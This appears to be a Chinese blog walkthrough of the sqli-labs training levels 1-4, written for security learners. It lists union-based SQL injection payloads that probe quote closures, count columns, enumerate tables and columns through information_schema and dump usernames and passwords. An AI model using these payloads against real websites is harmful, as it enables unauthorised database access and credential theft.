Sqli-labs(1-4)基于GET报错的sql注入

最新推荐文章于 2024-05-18 15:04:49 发布
最新推荐文章于 2024-05-18 15:04:49 发布
阅读量295 收藏 1
点赞数 3
分类专栏: DVWA与sqli-lab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangbz123/article/details/106268154
版权

sqli-lab(1-4)基于GET报错的注入
sqli-lab(1)
在地址后面输入?id=1,说明存在注入点。
在这里插入图片描述
闭合报错
在这里插入图片描述
后边跟order by 1–+ 没有报错
在这里插入图片描述
order by 3–+没有报错

在这里插入图片描述
在尝试order by 4–+结果报错,说明这一行中存在三个字段

在这里插入图片描述
下面使用union联合查询语句
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
?id=0’ UNION SELECT 1,2,3–+ 爆出2,3列可以利用,可以利用database(),user(),verison()函数得到数据库库名,用户名,数据库版本等
在这里插入图片描述
已经猜解到数据库security,接下来利用语句获取到表名,其中我们想要的是users表。

?id=0' UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

在这里插入图片描述
接下来利用sql语句获取字段名,我们想要的是username,password字段

?id=0' UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

在这里插入图片描述
下面利用sql语句得到username,password字段的内容

?id=0' UNION SELECT 1,group_concat(username,'|',password),3 from users--+

在这里插入图片描述
sqli-lab(2)
同sqli-lab(1)一样先?id=1
在这里插入图片描述
我们单引号闭合一下,结果报错
在这里插入图片描述
单引号去掉试一下
在这里插入图片描述
用lab(1)的方法测试一下,2和3都没问题,4出现错误,说明只有三个字段
在这里插入图片描述
在这里插入图片描述
同第一关一样就是没有闭合单引号

?id=0 UNION SELECT 1,2,3--+

在这里插入图片描述
同样不需要闭合单引号

?id=0 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

在这里插入图片描述

?id=0 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

在这里插入图片描述

?id=0 UNION SELECT 1,group_concat(username,'|',password),3 from users--+

在这里插入图片描述
sqli-labs(3)
首先尝试不闭合,也不报错啥的。
在这里插入图片描述
尝试单引号闭合,结果报错,不是我们想要的
在这里插入图片描述
双引号也不报错,再试!
在这里插入图片描述
尝试使用’)闭合结果使我们想要的

?id=1') order by 4--+

在这里插入图片描述
同1、2关一样不过只是闭合的方式不同

?id=0') UNION SELECT 1,2,3--+

在这里插入图片描述
sql函数爆出数据库名称和用户名

?id=0') UNION SELECT 1,database(),user()--+

在这里插入图片描述
爆出数据库中的表名

?id=0') UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

在这里插入图片描述
爆出users表里边的字段

?id=0') UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

在这里插入图片描述
爆出字段里的内容

?id=0') UNION SELECT 1,group_concat('USER:',username,'PASS:',password),3 from users--+

在这里插入图片描述
sqli-labs(4)
先试试不同的闭合方式

?id=1' order by 4--+

在这里插入图片描述

?id=1') order by 4--+

在这里插入图片描述

?id=1" order by 4--+

这里报错,好像是用")闭合
在这里插入图片描述

?id=1") order by 3--+

?id=1") order by 4--+

结果是我们想要的
在这里插入图片描述
在这里插入图片描述
union注入一下

?id=0") UNION SELECT 1,2,3--+

在这里插入图片描述

?id=0") UNION SELECT 1,database(),3--+

在这里插入图片描述

?id=0") UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

在这里插入图片描述

?id=0") UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

在这里插入图片描述

?id=0") UNION SELECT 1,group_concat(username,'|',password),3 from users--+

在这里插入图片描述

bye_X
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqli-labs靶场实现(四)【GET型的报错的注入(floor()、rand()、group by、count())】(less-5~6、具体步骤+图文详解)
weixin_46709219的博客
12-17 415
一)GET报错注入   1)报错注入介绍   2)GET单引号报错注入   3)GET双引号报错注入   4)sqlmap安全测试 二)补充知识 ———————————————————————————————————————————————————————— 一)GET报错注入 1)报错注入介绍 通过报错来显示出具体的信息,报错需要count(*),rand()、group by,三者缺一不可。其中,对于报错注入几个常用函数进行讲解: rand()————随机函数,返回0~1之间的某个值,它看起
sqli-labs:1-4,基于报错的注入
weixin_30594001的博客
03-23 101
sqli1: 脚本 1 # -*- coding: utf-8 -*- 2 """ 3 Created on Sat Mar 23 09:37:14 2019 4 5 @author: kenshin 6 """ 7 8 import requests,re 9 url = 'http://localhost/sqli-labs/...
详细sqli-labs(1-20)通关讲解
最新发布
m0_57928318的博客
05-18 1771
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sql-labs报错注入、
weixin_47346400的博客
03-12 548
updatexml() 爆数据库 爆表 爆用户
SQLI-LAB练习的显错注入(自我整理)
qq_43695654的博客
04-18 613
按照惯例,一进来就是先看看情况 页面显示正常,那看看不正常的样子 这样的话可以看出来,没有办法通过union联合查询来注入了,他完全就没有给你回显的地方。。。 这样的话,可以考虑一下显错注入,先让他语句报错,然后在错误里爆出我们想要的东西 报错了啊,那么接下来就是显错注入了,显错注入包括很多方式, 以下均摘自《代码审计:企业级Web代码安全架构》一书: 1.floor() {输出字符长度限...
sqli-labs 下载、安装
04-20 723
sqli-labs 下载、安装 下载地址:https://github.com/Audi-1/sqli-labs phpstudy:http://down.php.cn/PhpStudy20180211.zip 所需安装环境支持包:http://www.pc6.com/softview/SoftView_104246.html Tips:务必将sql的版本调到5.5以上,因为这样你的数据...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
Sqli-Labs.zip
07-15
对前四道题目进行加强,输出在数据库中构成的查询语句,有利于新手快速入门SQLi;
sqli-labs-master
08-22
sqli-labs-master是一个练习sql注入的代码环境
SQLI-LABS环境搭建
12-12
SQLI-LABS环境搭建,里面包含PhpStudy2018和sqli-labs-ma
sqli-lab 5(报错注入)冲关记录
qq_55777983的博客
06-27 193
sqli-lab 5(报错注入)冲关记录 时隔好久,这个less5卡了我好久 走了好多弯路 终于被我发现了一条最舒服的道路 今日一冲! less 5 首先尝试1’ 直接报错 但是这个报错信息看上去很简单 回显是you are in… 尝试正常查询 回显始终只有"You are in…" 这一关对于刚学的我来说有点崩溃,弄了好久,走了好多弯路 我们可以用报错注入和布尔型注入 接下来我们需要进行报错注入(布尔型注入太麻烦了) updatexml()这个是比较常用的报错注入(简单,常用,适合我这样的菜狗)
SQLI-LAB靶场 基于union报错注入 (1~4)
qq_52742521的博客
11-18 3724
web安全 第一关 首先在第一关的配置文件中添加 echo $sql; echo "<br>"; 这样可以在页面上显示sql语句(在每一关闯关的时候都记得修改配置文件,以后就不再提醒了) 是为了刚方便理解哈 配置好之后我们打开phpstudy,在火狐浏览器中打开sql的第一关。 闯关步骤如下 1. http://127.0.0.1/sqli/Less-1/?id=1' 查看是否有注入 2. http://127.0.0.1/sqli/Less-1/?id=1' ...
sqli-labs
qq_51110485的博客
07-16 1033
sqli-labsLess-1Less-2Less-3Less-4Less-5Less-6 Less-1 进入关卡内,先判断是否存在注入情况 先输入?id =1 and 1=1,发现没有变化,换成?id=1 and 1=2,依旧没有变化,考虑是为字符型而非整形。 用?id=1'进行测试,发现页面报错,出现如下显示,证明可以进行SQL注入 发现为字符型的后先在后面加一个注释符 --+,可以正常输出 单行注释: 1.使用#注释符,#注释符后直接加注释内容 2.使用–注释符,–注释符后需要加一个空格,注释才能
SQLI-lab靶场第三关+报错注入练习
huixing2022的博客
05-14 474
剩下的操作和less-1和less-2一样 表名应该也是emails,referers,uagents,users 顺便练习使用报错注入: 常用三大函数:updatexml() extractvalue() floor 使用函数报错获取信息:select、insert 、update、delete extractvalue(arg1,arg2) 是 mysql对xml文档数据进行查询和修改的XPATH函数 arg1:xml文档 ar...
sqli-labs通关-------01lesson 单引号(get方式注入)
枯藤闲画云
05-30 339
判断是否有注入点 1.1.实例遇到问题前提解决 根据页面提示尝试 http://127.0.0.1:90/sqli-labs/Less-1/?id=1 id=2 …….发现每次页面都有不同数值,姑且判断其具有注入点。毕竟这块是找了个教程跟着走的。 https://blog.csdn.net/qq_41420747/article/details/81836327 https://blog.c...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值